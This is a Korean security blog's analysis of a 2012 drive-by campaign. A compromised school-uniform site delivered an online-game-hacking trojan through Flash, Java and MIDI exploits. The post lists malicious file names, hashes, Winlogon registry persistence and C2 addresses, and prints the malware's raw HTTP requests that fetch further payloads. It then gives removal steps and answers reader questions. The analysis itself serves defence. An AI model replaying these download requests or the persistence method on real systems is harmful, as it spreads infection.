본문 바로가기

벌새::Analysis

Flash, Java, MIDI 3중 취약점을 이용한 악성코드 유포 주의 (2012.2.13)

주말을 이용한 악성코드 유포 중에서 Adobe Flash Player, Oracle JRE, MIDI 취약점을 함께 악용하여 취약점 패치가 이루어지지 않은 사용자가 특정 웹 사이트 접속시 자동으로 감염되도록 한 사례를 확인하였습니다.

특히 해당 사이트는 최근 졸업과 새학기 준비를 맞이하여 교복에 관심이 있다는 점에서 국내 유명 교복 관련 웹 사이트를 우연의 일치처럼 잘 활용하고 있는 것으로 보입니다.

해당 유포 사이트에 접속하면 그림과 같은 Adobe Flash Player, Oracle JRE, MIDI 취약점을 이용한 악성 스크립트를 통해 감염을 유발하고 있습니다.

일반적으로 보안 패치가 제대로 이루어지지 않은 사용자가 해당 웹 사이트에 접속을 할 경우 그림과 같은 Flash 오류, Java Applet 실행, Internet Explorer 웹 브라우저 종료와 같은 현상이 발생할 수 있습니다.

파일명 보안 제품 진단명
ad.html AhnLab V3                       JS/Exploit
Applet.html Hauri ViRobot HTML.S.Agent.228
Applet.jar Microsoft        Exploit:Java/CVE-2011-3544.M
uc.html AhnLab V3 JS/Iframe
f1.html avast! JS:Agent-JB [Trj]
kkxx.swf avast! SWF:CVE-2011-2140-A [Expl]
     e.avi AhnLab V3 Exploit/Cve-2011-2140
ie.html AhnLab V3 JS/Exploit
sro.js avast! JS:ShellCode-GU [Expl]
ms.html AhnLab V3 JS/Exploit
exp.mid Hauri ViRobot MID.S.CVE-2012-0003.75.A

이를 통해 최종적으로 다운로드된 파일 java.gif(= pk.exe 또는 (5자리 영문).exe) (MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42) 진단명으로 진단되고 있습니다.

1. Adobe Flash Player 취약점

Adobe Flash Player 취약점을 이용한 kkxx.swf 파일을 살펴보면 기존과 마찬가지로 2개의 악성 쉘코드(Shellcode)로 구성되어 있으며, 하나(Hauri ViRobot : SWF.S.Shellcode.927)는 e.avi 파일을 다운로드하며, 다른 하나는 XOR을 통해 pk.exe 최종 파일을 다운로드하도록 되어 있습니다.

2. MIDI 취약점

  MIDI 취약점을 이용한 정보 탈취 악성코드 유포 주의 (2012.1.27)

MIDI 취약점은 2012년 1월 윈도우 보안 업데이트를 통해 보안 패치가 공개된 상태이며, ms.html 악성 스크립트 내부에서는 그림과 같은 악의적으로 조작된 exp.mid 파일이 Windows Media Player를 통한 자동 실행을 통해 감염이 이루어지도록 구성되어 있습니다.

3. Oracle JRE 취약점

작년 하반기부터 본격적으로 등장한 Java 취약점을 이용한 유포 행위는 사용자 PC에 설치된 Oracle JRE 버전을 최신 버전으로 업데이트하지 않는 점을 노리고 있습니다.

이들 취약점을 이용한 파일 감염 흐름도를 살펴보면 ① "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs" 파일을 생성한 후, ② 인터넷 임시 폴더에 다운로드된 최종 파일은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.exe" 위치로 이동됩니다.(※ good.exe(MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)은 최종 파일과 일치합니다.)

③ good.exe 파일은 "C:\WINDOWS\system32\(5자리 영문).exe" 파일로 자가 복제한 후 자신은 삭제 처리가 이루어집니다.

[생성 파일 및 진단 정보]

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs

C:\WINDOWS\system32\utehd.exe
 - MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5
 - AhnLab V3 : Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42)
※ 해당 파일은 (5자리 영문).exe 형태입니다.

[변경 레지스트리 등록 정보]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
 - Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 전
 - Userinit = C:\WINDOWS\system32\userinit.exe,utehd.exe :: 변경 후

시스템 폴더에 생성된 (5자리 영문).exe 파일의 특징은 파일 날짜가 2014년 4월 19일로 등록된다는 점입니다.

해당 파일은 레지스트리 값(Winlogon)에 자신을 추가하여 Windows 시작시마다 자동으로 실행되어 특정 서버에 접속하는 동작을 확인할 수 있습니다.

우선 미국(USA)에 위치한 98.126.79.75(cjdcll.com) 서버에 쿼리를 전송하여 인터넷 연결 여부를 체크합니다.

그 후 일정 시간이 경과하면 추가적으로 국내에 위치한 특정 서버(61.78.35.195)로부터 2개의 파일을 다운로드 시도를 하고 있는 것을 확인할 수 있습니다.
GET /dwpzqq/dwpzqq.jpg HTTP/1.1
Accept: */*
Accept-Language: zh-tw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: dwpzqq.web799os.com
Connection: Keep-Alive

GET /dwpzqq/dwpzqq.gif HTTP/1.1
Accept: */*
Accept-Language: zh-tw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: dwpzqq.web799os.com
Connection: Keep-Alive
하지만 테스트 과정에서는 "400 Bad Request"가 뜨면서 실제 다운로드는 이루어지지 않고 있는 것을 확인할 수 있었습니다.

만약 정상적으로 동작이 이루어진다면 추가적인 악성 파일 다운로드를 통해 추가적인 감염이 발생할 것으로 보입니다.

해당 악성코드를 수동으로 처리할 필요가 있는 경우에는 다음과 같은 절차에 따라 문제를 해결하시기 바랍니다.

우선 시스템 폴더에 생성된 (5자리 영문).exe 파일은 explorer.exe 프로세스에 스레드 되어 있어 삭제가 쉽지 않습니다.

그러므로 마이크로소프트(Microsoft)사에서 무료로 제공하는 Process Explorer 프로그램을 다운로드 및 실행하여 explorer.exe 프로세스에 핸들(Handle)된 파일을 찾아 마우스 우클릭을 통해 "Close Handle" 메뉴를 클릭하시기 바랍니다.

  필요없는 프로세스 찾는 방법 (2009.3.21)

참고로 Process Explorer 프로그램에 대한 기본적인 사용 방법은 링크 내용을 참고하시기 바랍니다.

이를 통해 explorer.exe 프로세스에 핸들되어 있던 악성 파일은 윈도우 탐색기를 실행하여 사용자가 시스템 폴더에 위치한 파일을 쉽게 삭제하실 수 있습니다.

다음으로 레지스트리 편집기(regedit)를 실행하여 변경된 레지스트리 값을 윈도우 기본값으로 수정하시기 바랍니다.

레지스트리 편집기에서 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 값을 찾아 우측 패널의 "Userinit" 항목을 더블 클릭하시기 바랍니다.

Userinit 값을 보면 기본값(변경 전)에 추가적으로 (5자리 영문).exe 파일이 추가되어 있으므로 해당 파일명을 삭제하시면 됩니다.

단, 중요한 점은 수정한 후의 데이터 값은 반드시 "C:\WINDOWS\system32\userinit.exe," 값이어야 합니다.(※ 쉼표(,)를 반드시 추가하시기 바랍니다.)

위와 같이 중국발 악성코드 유포는 시스템 파일 패치 방식 이외에도 위와 같은 방식으로도 감염을 유발하여 다수의 추가적인 악성 파일을 지속적으로 다운로드할 수 있으므로 주의하시기 바랍니다.

또한 해당 악성코드에 감염된 사용자는 Adobe Flash Player, Oracle JRE (단, 설치된 사용자의 경우), 윈도우 보안 업데이트를 반드시 확인하여 패치를 하시기 바랍니다.
  • 철이 2012.02.13 13:34 댓글주소 수정/삭제 댓글쓰기

    V3 진단명이 WIN-TROJAN 인거보니 업데이트 후에 진단 가능했던 건가요?
    아니면 유포당시부터 잡았던 건가요?

  • 에구 2013.01.24 08:06 댓글주소 수정/삭제 댓글쓰기

    제가 윈도우7에서 Microsoft Security essential을 사용하고 있는데요, 1월 초쯤 부터 Exploit:JS/DonxRef.A 이런 이름의 바이러스가 격리되더라구요. 음, 이 글 읽어보니까, Flash, Java, MIDI 3중 취약점을 이용한다고 하던데요..제가 요새 미디 파일을 사용하고 있기도 하고..이 댓글 작성하기 30분 쯤 전에 시큐리티 에센셜을 켜봤는데 실시간 감시가 꺼져있더라구요. 너무 놀랐는데 다행히 격리는 되어있었구요. 그런데 자꾸 뭔가를 시도하는 거 같긴 한데..제가 워낙에 이쪽 분야엔 문외한이라서...아무리 찾아봐도 저 바이러스? 멀웨어? 에 대한 검색 결과가 하나도 없어서 벌새님께 이렇게 여쭤봅니다.. 제가 감염된 위의 바이러스가 이 글의 내용에 나오는 것과 동일한 것인가요? 어떻게 해결해야할지 모르겠습니다...혹시 알려주실수 있으신가요?

    • Exploit:JS/DonxRef.A 진단명을 봐서는 사용자가 특정 웹 사이트에 방문하였을 경우 자동으로 다운로드되는 파일 중 악성 스크립트 파일이 존재하여 차단한 것으로 보입니다.

      보통 이런 경우에는 2가지를 볼 수 있는데, 우선 방문 사이트는 해킹된 사이트이며 이로 인해 방문자를 대상으로 자동 감염을 유발할 것으로 보입니다.

      하지만 방문자가 보안 패치가 완벽하게 이루어진 경우에는 스크립트 파일이 다운로드되어도 백신의 진단 여부와 상관없이 자동 감염은 이루어지지 않습니다.

      하지만 보안 패치가 제대로 되어 있지 않은 사용자는 스크립트 진단이 없을 경우에는 자동 감염이 발생할 수 있습니다.

      에구님의 보안 패치 상태가 어떤지는 알 수 없지만 MSE에서 진단을 하여 차단하였다면 감염으로 연결되지는 않았을 것으로 보입니다. 하지만 그런 사이트는 위험하므로 당분간 접속하지 않는 것이 가장 안전하며, 윈도우, Flash, Java 보안 패치가 제대로 이루어졌는지 점검하시기 바랍니다.

      또한 해당 스크립트 파일들은 인터넷 임시 폴더에 1차적으로 다운로드되므로 임시 폴더 내의 파일을 삭제하는 것도 좋습니다.

    • 에구 2013.01.24 11:35 댓글주소 수정/삭제

      아..일단은 감염은 아닌가 보네요. 감사합니다. 그런데...몇 시간 사이에 또 문제가 생겼는데요...바이러스 검사를 한다고 시큐리티 에센셜로 검사를 하는 도중에 갑자기 윈도우 탐색기가 응답하지 않는다고 나온 후에 프로그램 창과 바탕화면 사진만 보이다가 다시 멀쩡하게 돌아온 다음부터 같이 깔려 있던 V3 lite가 작동을 하지 않네요. V3 lite가 윈도우7에서 제대로 작동하지 않는다는 말을 지인에게 들은적이 있긴 한데 이건 대체 무슨 일인지...갑자기 꺼진 게 이상해서 V3 Gamehack kill로 검사를 두번이나 했지만 아무것도 나오는게 없습니다. 컴퓨터를 끄거나 재부팅 하면 컴퓨터가 영영 안켜질것 같이 불안하구요...대체 뭐가 문제일까요.ㅠㅠ

    • Windows 7에서 V3 Lite가 제대로 동작하지 않는다는 것은 근거없는 소리이며, 내용을 봐서는 감염으로 인해 국내 백신 프로그램의 동작에 방해를 주는게 아닌가 의심이 됩니다.

      MSE에 진단하여 차단한 부분도 있지만 또 다른 사이트를 방문하는 과정에서 진단되지 않고 감염이 이루어졌을 확률도 높습니다.

      이런 경우 좀 더 확인해 보시길 원하신다면 Kaspersky에서 제공하는 수동 검사 프로그램(실시간 감시 미지원)을 이용하는 것도 방법입니다.

      http://www.kaspersky.com/virus-scanner (Kaspersky Virus Removal Tool 메뉴의 Download 클릭)

      그리고 되도록 PC에 2개 이상의 백신 프로그램을 함께 사용하지 마시기 바랍니다.